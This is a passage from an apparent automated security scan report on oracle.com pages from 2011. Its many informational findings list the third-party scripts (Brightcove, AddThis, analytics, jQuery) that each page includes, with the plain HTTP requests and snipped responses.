Host:	http://www.oracle.com
Path:	/us/corporate/press/Executives/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/press/Executives/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41172984997271740,0:1)
Date: Tue, 06 Sep 2011 16:13:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.249. http://www.oracle.com/us/corporate/press/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/press/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/press/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=35711371439084667,0:1)
Date: Tue, 06 Sep 2011 16:13:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.250. http://www.oracle.com/us/corporate/pricing/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/pricing/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/pricing/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=94;ecid=35995535065858112,0:1)
Date: Tue, 06 Sep 2011 16:15:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 119756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.251. http://www.oracle.com/us/corporate/pricing/price-lists/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/pricing/price-lists/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/pricing/price-lists/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=8;ecid=41143019010217386,0:1)
Date: Tue, 06 Sep 2011 16:15:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.252. http://www.oracle.com/us/corporate/profit/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/profit/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/profit/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41045476007478889,0:1)
Date: Tue, 06 Sep 2011 16:15:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 144329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.253. http://www.oracle.com/us/corporate/publishing/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/publishing/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/corporate/publishing/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41166585496136002,0:1)
Date: Tue, 06 Sep 2011 16:15:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.254. http://www.oracle.com/us/corporate/timeline/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/corporate/timeline/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js
http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code_ocom.js

Request

GET /us/corporate/timeline/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36008974018735591,0:1)
Date: Tue, 06 Sep 2011 16:15:55 GMT
Content-Length: 8926
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta content="text/html;
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code_ocom.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.255. http://www.oracle.com/us/go/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/go/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js
http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code_ocom.js

Request

Response

20.256. http://www.oracle.com/us/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41041820989036270,0:1)
Date: Tue, 06 Sep 2011 16:08:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 138644

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.257. http://www.oracle.com/us/industries/communications/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/industries/communications/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/industries/communications/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=36012062100267322,0:1)
Date: Tue, 06 Sep 2011 16:16:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 149889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.258. http://www.oracle.com/us/industries/education-and-research/018753.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/industries/education-and-research/018753.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/industries/education-and-research/018753.htm HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=36012169474451296,0:1)
Date: Tue, 06 Sep 2011 16:16:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 145519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.259. http://www.oracle.com/us/industries/engineering-and-construction/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/industries/engineering-and-construction/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/industries/engineering-and-construction/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41185062445493518,0:1)
Date: Tue, 06 Sep 2011 16:16:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 142100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.260. http://www.oracle.com/us/industries/financial-services/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/industries/financial-services/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/industries/financial-services/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41122746764032528,0:1)
Date: Tue, 06 Sep 2011 16:16:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.261. http://www.oracle.com/us/industries/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/industries/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/industries/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=1;ecid=35659771701213200,0:1)
Date: Tue, 06 Sep 2011 16:16:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 147665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.262. http://www.oracle.com/us/industries/retail/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/industries/retail/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/industries/retail/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41103114469486884,0:1)
Date: Tue, 06 Sep 2011 16:16:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 152114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.263. http://www.oracle.com/us/partnerships/solutions/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/partnerships/solutions/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/APIModules_all.js
http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/partnerships/solutions/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=7;ecid=35762992651810657,0:1)
Date: Tue, 06 Sep 2011 16:16:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 682670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/ocom/groups/public/@opnpublic/documents/webcontent/430048.css" />
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
<script src="http://admin.brightcove.com/js/APIModules_all.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.264. http://www.oracle.com/us/partnerships/specialized-showcase-224514.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/partnerships/specialized-showcase-224514.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/partnerships/specialized-showcase-224514.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41185719575500176,0:1)
Date: Tue, 06 Sep 2011 16:16:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 143087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
 <script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<div id="sidebody1" class="contents">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.265. http://www.oracle.com/us/products/applications/fusion/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/applications/fusion/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/products/applications/fusion/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41166757294830496,0:1)
Date: Tue, 06 Sep 2011 16:15:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.266. http://www.oracle.com/us/products/applications/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/applications/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/products/applications/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=158;ecid=35949802253392290,0:1)
Date: Tue, 06 Sep 2011 16:15:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.267. http://www.oracle.com/us/products/applications/jd-edwards-enterpriseone/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/applications/jd-edwards-enterpriseone/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/products/applications/jd-edwards-enterpriseone/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36009141522462811,0:1)
Date: Tue, 06 Sep 2011 16:15:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 162527

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.268. http://www.oracle.com/us/products/applications/peoplesoft-enterprise/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/applications/peoplesoft-enterprise/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/products/applications/peoplesoft-enterprise/index.html HTTP/1.1
